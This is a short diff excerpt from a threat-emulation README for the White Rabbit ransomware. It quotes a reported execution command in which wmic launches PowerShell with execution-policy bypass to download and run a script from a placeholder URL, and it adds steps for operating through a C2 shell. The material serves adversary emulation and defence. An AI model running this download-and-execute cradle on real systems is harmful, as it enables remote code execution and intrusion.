securepeacock/community-threats/WhiteRabbit/README.md

 7. As per CTI, execution of White Rabbit was done using ```wmic process call create "cmd /c powershell.exe -nop -ep bypass -c iex (New-Object System.Net.WebClient).DownloadString ('https://payloadurl/')"```

 ## Manual Emulation
+Launch a campaign with the C2 parameters you desire.
+Once you have a shell, execute the following procedures:
 ```
 loader --load run
 run cmd /c mkdir "%USERPROFILE%\Desktop\WhiteRabbit"